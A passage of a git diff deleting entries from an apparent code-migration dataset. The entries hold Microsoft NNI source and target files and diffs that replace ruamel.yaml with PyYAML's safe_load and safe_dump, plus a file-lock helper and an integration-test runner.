''.join(random.sample(string.ascii_letters + string.digits, 8))) - temp_dir = generate_folder_name() - while os.path.exists(temp_dir): - temp_dir = generate_folder_name() - os.makedirs(temp_dir) - return temp_dir - -class SimplePreemptiveLock(filelock.SoftFileLock): - '''this is a lock support check lock expiration, if you do not need check expiration, you can use SoftFileLock''' - def __init__(self, lock_file, stale=-1): - super(__class__, self).__init__(lock_file, timeout=-1) - self._lock_file_name = '{}.{}'.format(self._lock_file, os.getpid()) - self._stale = stale - - def _acquire(self): - open_mode = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_TRUNC - try: - lock_file_names = glob.glob(self._lock_file + '.*') - for file_name in lock_file_names: - if os.path.exists(file_name) and 
(self._stale < 0 or time.time() - os.stat(file_name).st_mtime < self._stale): - return None - fd = os.open(self._lock_file_name, open_mode) - except (IOError, OSError): - pass - else: - self._lock_file_fd = fd - return None - - def _release(self): - os.close(self._lock_file_fd) - self._lock_file_fd = None - try: - os.remove(self._lock_file_name) - except OSError: - pass - return None - -def get_file_lock(path: string, stale=-1): - return SimplePreemptiveLock(path + '.lock', stale=stale) diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.diff b/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.diff deleted file mode 100644 index c113da9..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.diff +++ /dev/null @@ -1,28 +0,0 @@ -diff --git a/nni/tools/package_utils/__init__.py b/nni/tools/package_utils/__init__.py - index 7075a83648c5364e164bf2727cccedf9ec293cbd..b955ac99a46094d2d701d447e9df07509767cc32 100644 - --- a/nni/tools/package_utils/__init__.py - +++ b/nni/tools/package_utils/__init__.py -@@ -6,7 +6,7 @@ import importlib - import os - from pathlib import Path - import sys --import ruamel.yaml as yaml -+import yaml - from nni.runtime.config import get_config_file - - ALGO_TYPES = ['tuners', 'assessors', 'advisors'] -@@ -215,7 +215,7 @@ def read_registerd_algo_meta(): - config_file = get_registered_algo_config_path() - if os.path.exists(config_file): - with open(config_file, 'r') as f: -- config = yaml.load(f, Loader=yaml.SafeLoader) -+ config = yaml.safe_load(f) - else: - config = defaultdict(list) - for t in ALGO_TYPES: -@@ -226,4 +226,4 @@ def read_registerd_algo_meta(): - def write_registered_algo_meta(config): - config_file = get_registered_algo_config_path() - with open(config_file, 'w') as f: -- f.write(yaml.dump(dict(config), default_flow_style=False)) -+ f.write(yaml.safe_dump(dict(config), default_flow_style=False)) diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.source.py b/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.source.py deleted file mode 100644 index 1fecdd9..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.source.py +++ /dev/null @@ -1,229 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -from collections import defaultdict -import importlib -import os -from pathlib import Path -import sys -import ruamel.yaml as yaml -from nni.runtime.config import get_config_file - -ALGO_TYPES = ['tuners', 'assessors', 'advisors'] - -def get_all_builtin_names(algo_type): - """Get all builtin names of registered algorithms of specified type - - Parameters - ---------- - algo_type: str - can be one of 'tuners', 'assessors' or 'advisors' - - Returns: list of string - ------- - All builtin names of specified type, for example, if algo_type is 'tuners', returns - all builtin tuner names. - """ - assert algo_type in ALGO_TYPES - - return [x['builtinName'] for x in read_registerd_algo_meta()[algo_type]] - - -def get_registered_algo_meta(builtin_name, algo_type=None): - """ Get meta information of registered algorithms. - - Parameters - ---------- - builtin_name: str - builtin name. 
- algo_type: str | None - can be one of 'tuners', 'assessors', 'advisors' or None - - Returns: dict | None - ------- - Returns meta information of speicified builtin alogorithms, for example: - { - 'classArgsValidator': 'nni.smac_tuner.SMACClassArgsValidator', - 'className': 'nni.smac_tuner.SMACTuner', - 'builtinName': 'SMAC' - } - """ - assert builtin_name is not None - if algo_type: - assert algo_type in ALGO_TYPES - config = read_registerd_algo_meta() - - candidates = [] - if algo_type: - candidates = config[algo_type] - else: - for algo_type in ALGO_TYPES: - candidates.extend(config[algo_type]) - for meta in candidates: - if meta['builtinName'] == builtin_name: - return meta - return None - -def parse_full_class_name(full_class_name): - if not full_class_name: - return None, None - parts = full_class_name.split('.') - module_name, class_name = '.'.join(parts[:-1]), parts[-1] - return module_name, class_name - -def get_builtin_module_class_name(algo_type, builtin_name): - """Get module name and class name of all builtin algorithms - - Parameters - ---------- - algo_type: str - can be one of 'tuners', 'assessors', 'advisors' - builtin_name: str - builtin name. - - Returns: tuple - ------- - tuple of (module name, class name) - """ - assert algo_type in ALGO_TYPES - assert builtin_name is not None - meta = get_registered_algo_meta(builtin_name, algo_type) - if not meta: - return None, None - return parse_full_class_name(meta['className']) - -def create_validator_instance(algo_type, builtin_name): - """Create instance of validator class - - Parameters - ---------- - algo_type: str - can be one of 'tuners', 'assessors', 'advisors' - builtin_name: str - builtin name. - - Returns: object | None - ------- - Returns validator class instance. - If specified validator class does not exist, returns None. - """ - assert algo_type in ALGO_TYPES - assert builtin_name is not None - meta = get_registered_algo_meta(builtin_name, algo_type) - if not meta or 'classArgsValidator' not in meta: - return None - module_name, class_name = parse_full_class_name(meta['classArgsValidator']) - class_module = importlib.import_module(module_name) - class_constructor = getattr(class_module, class_name) - - return class_constructor() - -def create_builtin_class_instance(builtin_name, input_class_args, algo_type): - """Create instance of builtin algorithms - - Parameters - ---------- - builtin_name: str - builtin name. - input_class_args: dict - kwargs for builtin class constructor - algo_type: str - can be one of 'tuners', 'assessors', 'advisors' - - Returns: object - ------- - Returns builtin class instance. - """ - assert algo_type in ALGO_TYPES - if builtin_name not in get_all_builtin_names(algo_type): - raise RuntimeError('Builtin name is not found: {}'.format(builtin_name)) - - def parse_algo_meta(algo_meta, input_class_args): - """ - 1. parse class_name field in meta data into module name and class name, - for example: - parse class_name 'nni.hyperopt_tuner.hyperopt_tuner.HyperoptTuner' in meta data into: - module name: nni.hyperopt_tuner.hyperopt_tuner - class name: HyperoptTuner - 2. merge user specified class args together with builtin class args. 
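# ---- editorial note: illustrative sketch, not part of the original patch ----
# The package_utils hunk earlier in this listing also switches the write path
# from yaml.dump to yaml.safe_dump. A round-trip sketch, assuming PyYAML;
# algos.yml is a hypothetical path:
import yaml

meta = {'tuners': [{'builtinName': 'TPE'}], 'assessors': [], 'advisors': []}
with open('algos.yml', 'w') as f:
    f.write(yaml.safe_dump(dict(meta), default_flow_style=False))
with open('algos.yml') as f:
    assert yaml.safe_load(f) == meta
# ---- end note ----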
- """ - assert algo_meta - module_name, class_name = parse_full_class_name(algo_meta['className']) - - class_args = {} - if 'classArgs' in algo_meta: - class_args = algo_meta['classArgs'] - if input_class_args is not None: - class_args.update(input_class_args) - - return module_name, class_name, class_args - - algo_meta = get_registered_algo_meta(builtin_name, algo_type) - module_name, class_name, class_args = parse_algo_meta(algo_meta, input_class_args) - - if importlib.util.find_spec(module_name) is None: - raise RuntimeError('Builtin module can not be loaded: {}'.format(module_name)) - - class_module = importlib.import_module(module_name) - class_constructor = getattr(class_module, class_name) - - instance = class_constructor(**class_args) - - return instance - -def create_customized_class_instance(class_params): - """Create instance of customized algorithms - - Parameters - ---------- - class_params: dict - class_params should contains following keys: - codeDirectory: code directory - className: qualified class name - classArgs (optional): kwargs pass to class constructor - - Returns: object - ------- - Returns customized class instance. - """ - - code_dir = class_params.get('classDirectory') - qualified_class_name = class_params.get('className') - class_args = class_params.get('classArgs') - - if code_dir and not os.path.isdir(code_dir): - raise ValueError(f'Directory not found: {code_dir}') - - sys.path.append(code_dir) - module_name, class_name = qualified_class_name.rsplit('.', 1) - class_module = importlib.import_module(module_name) - class_constructor = getattr(class_module, class_name) - - if class_args is None: - class_args = {} - instance = class_constructor(**class_args) - - return instance - -def _using_conda_or_virtual_environment(): - return sys.prefix != sys.base_prefix or os.path.isdir(os.path.join(sys.prefix, 'conda-meta')) - -def get_registered_algo_config_path(): - return str(get_config_file('registered_algorithms.yml')) - -def read_registerd_algo_meta(): - config_file = get_registered_algo_config_path() - if os.path.exists(config_file): - with open(config_file, 'r') as f: - config = yaml.load(f, Loader=yaml.SafeLoader) - else: - config = defaultdict(list) - for t in ALGO_TYPES: - if t not in config: - config[t] = [] - return config - -def write_registered_algo_meta(config): - config_file = get_registered_algo_config_path() - with open(config_file, 'w') as f: - f.write(yaml.dump(dict(config), default_flow_style=False)) diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.target.py b/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.target.py deleted file mode 100644 index 9a86cbe..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.target.py +++ /dev/null @@ -1,229 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -from collections import defaultdict -import importlib -import os -from pathlib import Path -import sys -import yaml -from nni.runtime.config import get_config_file - -ALGO_TYPES = ['tuners', 'assessors', 'advisors'] - -def get_all_builtin_names(algo_type): - """Get all builtin names of registered algorithms of specified type - - Parameters - ---------- - algo_type: str - can be one of 'tuners', 'assessors' or 'advisors' - - Returns: list of string - ------- - All builtin names of specified type, for example, if algo_type is 'tuners', returns - all builtin tuner names. 
- """ - assert algo_type in ALGO_TYPES - - return [x['builtinName'] for x in read_registerd_algo_meta()[algo_type]] - - -def get_registered_algo_meta(builtin_name, algo_type=None): - """ Get meta information of registered algorithms. - - Parameters - ---------- - builtin_name: str - builtin name. - algo_type: str | None - can be one of 'tuners', 'assessors', 'advisors' or None - - Returns: dict | None - ------- - Returns meta information of speicified builtin alogorithms, for example: - { - 'classArgsValidator': 'nni.smac_tuner.SMACClassArgsValidator', - 'className': 'nni.smac_tuner.SMACTuner', - 'builtinName': 'SMAC' - } - """ - assert builtin_name is not None - if algo_type: - assert algo_type in ALGO_TYPES - config = read_registerd_algo_meta() - - candidates = [] - if algo_type: - candidates = config[algo_type] - else: - for algo_type in ALGO_TYPES: - candidates.extend(config[algo_type]) - for meta in candidates: - if meta['builtinName'] == builtin_name: - return meta - return None - -def parse_full_class_name(full_class_name): - if not full_class_name: - return None, None - parts = full_class_name.split('.') - module_name, class_name = '.'.join(parts[:-1]), parts[-1] - return module_name, class_name - -def get_builtin_module_class_name(algo_type, builtin_name): - """Get module name and class name of all builtin algorithms - - Parameters - ---------- - algo_type: str - can be one of 'tuners', 'assessors', 'advisors' - builtin_name: str - builtin name. - - Returns: tuple - ------- - tuple of (module name, class name) - """ - assert algo_type in ALGO_TYPES - assert builtin_name is not None - meta = get_registered_algo_meta(builtin_name, algo_type) - if not meta: - return None, None - return parse_full_class_name(meta['className']) - -def create_validator_instance(algo_type, builtin_name): - """Create instance of validator class - - Parameters - ---------- - algo_type: str - can be one of 'tuners', 'assessors', 'advisors' - builtin_name: str - builtin name. - - Returns: object | None - ------- - Returns validator class instance. - If specified validator class does not exist, returns None. - """ - assert algo_type in ALGO_TYPES - assert builtin_name is not None - meta = get_registered_algo_meta(builtin_name, algo_type) - if not meta or 'classArgsValidator' not in meta: - return None - module_name, class_name = parse_full_class_name(meta['classArgsValidator']) - class_module = importlib.import_module(module_name) - class_constructor = getattr(class_module, class_name) - - return class_constructor() - -def create_builtin_class_instance(builtin_name, input_class_args, algo_type): - """Create instance of builtin algorithms - - Parameters - ---------- - builtin_name: str - builtin name. - input_class_args: dict - kwargs for builtin class constructor - algo_type: str - can be one of 'tuners', 'assessors', 'advisors' - - Returns: object - ------- - Returns builtin class instance. - """ - assert algo_type in ALGO_TYPES - if builtin_name not in get_all_builtin_names(algo_type): - raise RuntimeError('Builtin name is not found: {}'.format(builtin_name)) - - def parse_algo_meta(algo_meta, input_class_args): - """ - 1. parse class_name field in meta data into module name and class name, - for example: - parse class_name 'nni.hyperopt_tuner.hyperopt_tuner.HyperoptTuner' in meta data into: - module name: nni.hyperopt_tuner.hyperopt_tuner - class name: HyperoptTuner - 2. merge user specified class args together with builtin class args. 
- """ - assert algo_meta - module_name, class_name = parse_full_class_name(algo_meta['className']) - - class_args = {} - if 'classArgs' in algo_meta: - class_args = algo_meta['classArgs'] - if input_class_args is not None: - class_args.update(input_class_args) - - return module_name, class_name, class_args - - algo_meta = get_registered_algo_meta(builtin_name, algo_type) - module_name, class_name, class_args = parse_algo_meta(algo_meta, input_class_args) - - if importlib.util.find_spec(module_name) is None: - raise RuntimeError('Builtin module can not be loaded: {}'.format(module_name)) - - class_module = importlib.import_module(module_name) - class_constructor = getattr(class_module, class_name) - - instance = class_constructor(**class_args) - - return instance - -def create_customized_class_instance(class_params): - """Create instance of customized algorithms - - Parameters - ---------- - class_params: dict - class_params should contains following keys: - codeDirectory: code directory - className: qualified class name - classArgs (optional): kwargs pass to class constructor - - Returns: object - ------- - Returns customized class instance. - """ - - code_dir = class_params.get('classDirectory') - qualified_class_name = class_params.get('className') - class_args = class_params.get('classArgs') - - if code_dir and not os.path.isdir(code_dir): - raise ValueError(f'Directory not found: {code_dir}') - - sys.path.append(code_dir) - module_name, class_name = qualified_class_name.rsplit('.', 1) - class_module = importlib.import_module(module_name) - class_constructor = getattr(class_module, class_name) - - if class_args is None: - class_args = {} - instance = class_constructor(**class_args) - - return instance - -def _using_conda_or_virtual_environment(): - return sys.prefix != sys.base_prefix or os.path.isdir(os.path.join(sys.prefix, 'conda-meta')) - -def get_registered_algo_config_path(): - return str(get_config_file('registered_algorithms.yml')) - -def read_registerd_algo_meta(): - config_file = get_registered_algo_config_path() - if os.path.exists(config_file): - with open(config_file, 'r') as f: - config = yaml.safe_load(f) - else: - config = defaultdict(list) - for t in ALGO_TYPES: - if t not in config: - config[t] = [] - return config - -def write_registered_algo_meta(config): - config_file = get_registered_algo_config_path() - with open(config_file, 'w') as f: - f.write(yaml.safe_dump(dict(config), default_flow_style=False)) diff --git a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.diff b/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.diff deleted file mode 100644 index d6fc425..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.diff +++ /dev/null @@ -1,22 +0,0 @@ -diff --git a/test/nni_test/nnitest/run_tests.py b/test/nni_test/nnitest/run_tests.py - index 7075a83648c5364e164bf2727cccedf9ec293cbd..b955ac99a46094d2d701d447e9df07509767cc32 100644 - --- a/test/nni_test/nnitest/run_tests.py - +++ b/test/nni_test/nnitest/run_tests.py -@@ -9,7 +9,7 @@ import subprocess - import sys - import time - --import ruamel.yaml as yaml -+import yaml - - import validators - from utils import (CLEAR, EXPERIMENT_URL, GREEN, RED, REST_ENDPOINT, -@@ -80,7 +80,7 @@ def prepare_config_file(test_case_config, it_config, args): - # generate temporary config yml file to launch experiment - new_config_file = config_path + '.tmp' - dump_yml_content(new_config_file, test_yml_config) -- print(yaml.dump(test_yml_config, 
default_flow_style=False), flush=True) -+ print(yaml.safe_dump(test_yml_config, default_flow_style=False), flush=True) - - return new_config_file - diff --git a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.source.py b/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.source.py deleted file mode 100644 index f517f0a..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.source.py +++ /dev/null @@ -1,293 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -import argparse -import datetime -import json -import os -import subprocess -import sys -import time - -import ruamel.yaml as yaml - -import validators -from utils import (CLEAR, EXPERIMENT_URL, GREEN, RED, REST_ENDPOINT, - STATUS_URL, TRIAL_JOBS_URL, deep_update, dump_yml_content, - get_experiment_dir, get_experiment_id, - get_experiment_status, get_failed_trial_jobs, - get_trial_stats, get_yml_content, parse_max_duration_time, - print_experiment_log, print_trial_job_log, - wait_for_port_available) - -it_variables = {} - - -def update_training_service_config(config, training_service, config_file_path): - it_ts_config = get_yml_content(os.path.join('config', 'training_service.yml')) - - # hack for kubeflow trial config - if training_service == 'kubeflow': - it_ts_config[training_service]['trial']['worker']['command'] = config['trial']['command'] - config['trial'].pop('command') - if 'gpuNum' in config['trial']: - config['trial'].pop('gpuNum') - - if training_service == 'frameworkcontroller': - it_ts_config[training_service]['trial']['taskRoles'][0]['command'] = config['trial']['command'] - config['trial'].pop('command') - if 'gpuNum' in config['trial']: - config['trial'].pop('gpuNum') - - if training_service == 'adl': - # hack for adl trial config, codeDir in adl mode refers to path in container - containerCodeDir = config['trial']['codeDir'] - # replace metric test folders to container folder - if config['trial']['codeDir'] == '.': - containerCodeDir = '/' + config_file_path[:config_file_path.rfind('/')] - elif config['trial']['codeDir'] == '../naive_trial': - containerCodeDir = '/test/config/naive_trial' - elif '../../../' in config['trial']['codeDir']: - # replace example folders to container folder - containerCodeDir = config['trial']['codeDir'].replace('../../../', '/') - it_ts_config[training_service]['trial']['codeDir'] = containerCodeDir - it_ts_config[training_service]['trial']['command'] = 'cd {0} && {1}'.format(containerCodeDir, config['trial']['command']) - - if training_service == 'hybrid': - it_ts_config = get_yml_content(os.path.join('config', 'training_service_v2.yml')) - else: - deep_update(config, it_ts_config['all']) - deep_update(config, it_ts_config[training_service]) - - -def prepare_config_file(test_case_config, it_config, args): - config_path = args.nni_source_dir + test_case_config['configFile'] - test_yml_config = get_yml_content(config_path) - - # apply test case specific config - if test_case_config.get('config') is not None: - deep_update(test_yml_config, test_case_config['config']) - - # hack for windows - if sys.platform == 'win32' and args.ts == 'local': - test_yml_config['trial']['command'] = test_yml_config['trial']['command'].replace('python3', 'python') - - # apply training service config - # user's gpuNum, logCollection config is overwritten by the config in training_service.yml - # the hack for kubeflow should be applied at last step - 
update_training_service_config(test_yml_config, args.ts, test_case_config['configFile']) - - # generate temporary config yml file to launch experiment - new_config_file = config_path + '.tmp' - dump_yml_content(new_config_file, test_yml_config) - print(yaml.dump(test_yml_config, default_flow_style=False), flush=True) - - return new_config_file - - -def run_test_case(test_case_config, it_config, args): - new_config_file = prepare_config_file(test_case_config, it_config, args) - # set configFile variable - it_variables['$configFile'] = new_config_file - - try: - launch_test(new_config_file, args.ts, test_case_config) - invoke_validator(test_case_config, args.nni_source_dir, args.ts) - finally: - stop_command = get_command(test_case_config, 'stopCommand') - print('Stop command:', stop_command, flush=True) - if stop_command: - subprocess.run(stop_command, shell=True) - exit_command = get_command(test_case_config, 'onExitCommand') - print('Exit command:', exit_command, flush=True) - if exit_command: - subprocess.run(exit_command, shell=True, check=True) - # remove tmp config file - if os.path.exists(new_config_file): - os.remove(new_config_file) - - -def invoke_validator(test_case_config, nni_source_dir, training_service): - validator_config = test_case_config.get('validator') - if validator_config is None or validator_config.get('class') is None: - return - - validator = validators.__dict__[validator_config.get('class')]() - kwargs = validator_config.get('kwargs', {}) - print('kwargs:', kwargs) - experiment_id = get_experiment_id(EXPERIMENT_URL) - try: - validator(REST_ENDPOINT, get_experiment_dir(EXPERIMENT_URL), nni_source_dir, **kwargs) - except: - print_experiment_log(experiment_id=experiment_id) - print_trial_job_log(training_service, TRIAL_JOBS_URL) - raise - - -def get_max_values(config_file): - experiment_config = get_yml_content(config_file) - if experiment_config.get('maxExecDuration'): - return parse_max_duration_time(experiment_config['maxExecDuration']), experiment_config['maxTrialNum'] - else: - return parse_max_duration_time(experiment_config['maxExperimentDuration']), experiment_config['maxTrialNumber'] - - -def get_command(test_case_config, commandKey): - command = test_case_config.get(commandKey) - if commandKey == 'launchCommand': - assert command is not None - if command is None: - return None - - # replace variables - for k in it_variables: - command = command.replace(k, it_variables[k]) - - # hack for windows, not limited to local training service - if sys.platform == 'win32': - command = command.replace('python3', 'python') - - return command - - -def launch_test(config_file, training_service, test_case_config): - launch_command = get_command(test_case_config, 'launchCommand') - print('launch command: ', launch_command, flush=True) - - proc = subprocess.run(launch_command, shell=True) - - assert proc.returncode == 0, 'launch command failed with code %d' % proc.returncode - - # set experiment ID into variable - exp_var_name = test_case_config.get('setExperimentIdtoVar') - if exp_var_name is not None: - assert exp_var_name.startswith('$') - it_variables[exp_var_name] = get_experiment_id(EXPERIMENT_URL) - print('variables:', it_variables) - - max_duration, max_trial_num = get_max_values(config_file) - print('max_duration:', max_duration, ' max_trial_num:', max_trial_num) - - if not test_case_config.get('experimentStatusCheck'): - return - - bg_time = time.time() - print(str(datetime.datetime.now()), ' waiting ...', flush=True) - try: - # wait restful server to be ready - 
time.sleep(3) - experiment_id = get_experiment_id(EXPERIMENT_URL) - while True: - waited_time = time.time() - bg_time - if waited_time > max_duration + 10: - print('waited: {}, max_duration: {}'.format(waited_time, max_duration)) - break - status = get_experiment_status(STATUS_URL) - if status in ['DONE', 'ERROR']: - print('experiment status:', status) - break - num_failed = len(get_failed_trial_jobs(TRIAL_JOBS_URL)) - if num_failed > 0: - print('failed jobs: ', num_failed) - break - time.sleep(1) - except: - print_experiment_log(experiment_id=experiment_id) - raise - print(str(datetime.datetime.now()), ' waiting done', flush=True) - if get_experiment_status(STATUS_URL) == 'ERROR': - print_experiment_log(experiment_id=experiment_id) - - trial_stats = get_trial_stats(TRIAL_JOBS_URL) - print(json.dumps(trial_stats, indent=4), flush=True) - if status != 'DONE' or trial_stats['SUCCEEDED'] + trial_stats['EARLY_STOPPED'] < max_trial_num: - print_experiment_log(experiment_id=experiment_id) - print_trial_job_log(training_service, TRIAL_JOBS_URL) - raise AssertionError('Failed to finish in maxExecDuration') - - -def case_excluded(name, excludes): - if name is None: - return False - if excludes is not None: - excludes = excludes.split(',') - for e in excludes: - if name in e or e in name: - return True - return False - - -def case_included(name, cases): - assert cases is not None - for case in cases.split(','): - if case in name: - return True - return False - - -def match_platform(test_case_config): - return sys.platform in test_case_config['platform'].split(' ') - - -def match_training_service(test_case_config, cur_training_service): - case_ts = test_case_config['trainingService'] - assert case_ts is not None - if case_ts == 'all': - return True - if cur_training_service in case_ts.split(' '): - return True - return False - - -def run(args): - it_config = get_yml_content(args.config) - - for test_case_config in it_config['testCases']: - name = test_case_config['name'] - if case_excluded(name, args.exclude): - print('{} excluded'.format(name)) - continue - if args.cases and not case_included(name, args.cases): - continue - - # fill test case default config - for k in it_config['defaultTestCaseConfig']: - if k not in test_case_config: - test_case_config[k] = it_config['defaultTestCaseConfig'][k] - print(json.dumps(test_case_config, indent=4)) - - if not match_platform(test_case_config): - print('skipped {}, platform {} not match [{}]'.format(name, sys.platform, test_case_config['platform'])) - continue - - if not match_training_service(test_case_config, args.ts): - print('skipped {}, training service {} not match [{}]'.format( - name, args.ts, test_case_config['trainingService'])) - continue - # remote mode need more time to cleanup - if args.ts == 'remote' or args.ts == 'hybrid': - wait_for_port_available(8080, 240) - else: - wait_for_port_available(8080, 60) - - # adl mode need more time to cleanup PVC - if args.ts == 'adl' and name == 'nnictl-resume-2': - time.sleep(30) - print('## {}Testing: {}{} ##'.format(GREEN, name, CLEAR)) - begin_time = time.time() - - run_test_case(test_case_config, it_config, args) - print('{}Test {}: TEST PASS IN {} SECONDS{}'.format(GREEN, name, int(time.time()-begin_time), CLEAR), flush=True) - - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - parser.add_argument("--config", type=str, required=True) - parser.add_argument("--nni_source_dir", type=str, default='../') - parser.add_argument("--cases", type=str, default=None) - 
parser.add_argument("--exclude", type=str, default=None) - parser.add_argument("--ts", type=str, choices=['local', 'remote', 'pai', - 'kubeflow', 'frameworkcontroller', 'adl', 'aml', 'hybrid'], default='local') - args = parser.parse_args() - - run(args) diff --git a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.target.py b/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.target.py deleted file mode 100644 index f87416a..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.target.py +++ /dev/null @@ -1,293 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -import argparse -import datetime -import json -import os -import subprocess -import sys -import time - -import yaml - -import validators -from utils import (CLEAR, EXPERIMENT_URL, GREEN, RED, REST_ENDPOINT, - STATUS_URL, TRIAL_JOBS_URL, deep_update, dump_yml_content, - get_experiment_dir, get_experiment_id, - get_experiment_status, get_failed_trial_jobs, - get_trial_stats, get_yml_content, parse_max_duration_time, - print_experiment_log, print_trial_job_log, - wait_for_port_available) - -it_variables = {} - - -def update_training_service_config(config, training_service, config_file_path): - it_ts_config = get_yml_content(os.path.join('config', 'training_service.yml')) - - # hack for kubeflow trial config - if training_service == 'kubeflow': - it_ts_config[training_service]['trial']['worker']['command'] = config['trial']['command'] - config['trial'].pop('command') - if 'gpuNum' in config['trial']: - config['trial'].pop('gpuNum') - - if training_service == 'frameworkcontroller': - it_ts_config[training_service]['trial']['taskRoles'][0]['command'] = config['trial']['command'] - config['trial'].pop('command') - if 'gpuNum' in config['trial']: - config['trial'].pop('gpuNum') - - if training_service == 'adl': - # hack for adl trial config, codeDir in adl mode refers to path in container - containerCodeDir = config['trial']['codeDir'] - # replace metric test folders to container folder - if config['trial']['codeDir'] == '.': - containerCodeDir = '/' + config_file_path[:config_file_path.rfind('/')] - elif config['trial']['codeDir'] == '../naive_trial': - containerCodeDir = '/test/config/naive_trial' - elif '../../../' in config['trial']['codeDir']: - # replace example folders to container folder - containerCodeDir = config['trial']['codeDir'].replace('../../../', '/') - it_ts_config[training_service]['trial']['codeDir'] = containerCodeDir - it_ts_config[training_service]['trial']['command'] = 'cd {0} && {1}'.format(containerCodeDir, config['trial']['command']) - - if training_service == 'hybrid': - it_ts_config = get_yml_content(os.path.join('config', 'training_service_v2.yml')) - else: - deep_update(config, it_ts_config['all']) - deep_update(config, it_ts_config[training_service]) - - -def prepare_config_file(test_case_config, it_config, args): - config_path = args.nni_source_dir + test_case_config['configFile'] - test_yml_config = get_yml_content(config_path) - - # apply test case specific config - if test_case_config.get('config') is not None: - deep_update(test_yml_config, test_case_config['config']) - - # hack for windows - if sys.platform == 'win32' and args.ts == 'local': - test_yml_config['trial']['command'] = test_yml_config['trial']['command'].replace('python3', 'python') - - # apply training service config - # user's gpuNum, logCollection config is overwritten by the config in training_service.yml - # the 
hack for kubeflow should be applied at last step - update_training_service_config(test_yml_config, args.ts, test_case_config['configFile']) - - # generate temporary config yml file to launch experiment - new_config_file = config_path + '.tmp' - dump_yml_content(new_config_file, test_yml_config) - print(yaml.safe_dump(test_yml_config, default_flow_style=False), flush=True) - - return new_config_file - - -def run_test_case(test_case_config, it_config, args): - new_config_file = prepare_config_file(test_case_config, it_config, args) - # set configFile variable - it_variables['$configFile'] = new_config_file - - try: - launch_test(new_config_file, args.ts, test_case_config) - invoke_validator(test_case_config, args.nni_source_dir, args.ts) - finally: - stop_command = get_command(test_case_config, 'stopCommand') - print('Stop command:', stop_command, flush=True) - if stop_command: - subprocess.run(stop_command, shell=True) - exit_command = get_command(test_case_config, 'onExitCommand') - print('Exit command:', exit_command, flush=True) - if exit_command: - subprocess.run(exit_command, shell=True, check=True) - # remove tmp config file - if os.path.exists(new_config_file): - os.remove(new_config_file) - - -def invoke_validator(test_case_config, nni_source_dir, training_service): - validator_config = test_case_config.get('validator') - if validator_config is None or validator_config.get('class') is None: - return - - validator = validators.__dict__[validator_config.get('class')]() - kwargs = validator_config.get('kwargs', {}) - print('kwargs:', kwargs) - experiment_id = get_experiment_id(EXPERIMENT_URL) - try: - validator(REST_ENDPOINT, get_experiment_dir(EXPERIMENT_URL), nni_source_dir, **kwargs) - except: - print_experiment_log(experiment_id=experiment_id) - print_trial_job_log(training_service, TRIAL_JOBS_URL) - raise - - -def get_max_values(config_file): - experiment_config = get_yml_content(config_file) - if experiment_config.get('maxExecDuration'): - return parse_max_duration_time(experiment_config['maxExecDuration']), experiment_config['maxTrialNum'] - else: - return parse_max_duration_time(experiment_config['maxExperimentDuration']), experiment_config['maxTrialNumber'] - - -def get_command(test_case_config, commandKey): - command = test_case_config.get(commandKey) - if commandKey == 'launchCommand': - assert command is not None - if command is None: - return None - - # replace variables - for k in it_variables: - command = command.replace(k, it_variables[k]) - - # hack for windows, not limited to local training service - if sys.platform == 'win32': - command = command.replace('python3', 'python') - - return command - - -def launch_test(config_file, training_service, test_case_config): - launch_command = get_command(test_case_config, 'launchCommand') - print('launch command: ', launch_command, flush=True) - - proc = subprocess.run(launch_command, shell=True) - - assert proc.returncode == 0, 'launch command failed with code %d' % proc.returncode - - # set experiment ID into variable - exp_var_name = test_case_config.get('setExperimentIdtoVar') - if exp_var_name is not None: - assert exp_var_name.startswith('$') - it_variables[exp_var_name] = get_experiment_id(EXPERIMENT_URL) - print('variables:', it_variables) - - max_duration, max_trial_num = get_max_values(config_file) - print('max_duration:', max_duration, ' max_trial_num:', max_trial_num) - - if not test_case_config.get('experimentStatusCheck'): - return - - bg_time = time.time() - print(str(datetime.datetime.now()), ' waiting ...', 
